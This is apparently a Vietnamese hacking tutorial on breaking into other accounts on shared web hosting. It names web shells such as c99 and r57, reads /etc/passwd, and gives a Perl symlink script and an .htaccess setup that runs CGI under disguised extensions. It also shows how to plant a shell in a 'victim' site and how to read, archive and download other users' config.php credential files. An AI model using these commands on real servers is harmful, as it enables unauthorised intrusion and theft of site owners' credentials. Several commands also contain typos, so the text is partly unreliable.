Có thể run các câu lệnh trên shell cmd.php shell tmp.php, shell ssi.shtml hoặc một số shell thông dụng khác như byg.php, vhb.php,
c99.php, r57.php.
Liệt kê các user có trên server.
#: cat /etc/passwd
#: more /etc/passwd
#: less /etc/passwd
Trường hợp sử dụng lệnh không được, ta tạo 1 file php với nội dung chính là câu lệnh get user:
<?php include ("cat /etc/passwd"); ?>
Hoặc file shtml: cat.shtml
Cgi Shell Symlink
#!/usr/bin/perl -w
symlink('/etc/passwd','/home/sinhthanhanmoi/public_html/Hinh CTSP/tmp/tyn.txt');
trước khi chạy hãy chmod thành 0775 nhé
.htaccess
Options +ExecCGI
AddHandler cgi-script cgi pl cgi love jpg sa
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
Đi đến thư mục public_html của user.
#: dir /home/user/public_html/
Xem tất cả các mục trong user
#: Is -ao
Sử dụng symbolic link ghi file index.php vào file kenz.txt trên cùng thư mục với shell:
#: ln -s /home/user/public_html/index.php kenz.txt
Ví dụ shell là http://vnline.co/shell.php thì vào http://vnline.co/kenz.txt
Vậy thử ghi shell của mình vào host victim:
#: ln -s /home/user_host_shell/public_html/shell.php /home/user_host_victim/public_html/shell.php lựa chọn thư mục chmod 777 hay 755
để có quyền ghi. Ví dụ như ./images hoặc trong wordpress là ./wp-content/uploads/
Nếu bị chmod mà không thể ghi, thì có thể cd qua dir victim rồi run command:
#: cd /home/user_host_victim/public_html/
Để xem file config.php:
#: cat /home/user/public_html/config.php
Xem file của máy chủ
<!--#include virtual="config.txt"-->
Ghi:
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml
Nếu ko xem được ta sẽ nén nó và tải về xem:
#: tar -czf kenz.tar.gz /home/user/public_html/config.php
Nếu nén bằng tar cũng không được thì zip nó về:
#: zip kenz.zip /home/user/public_html/config.php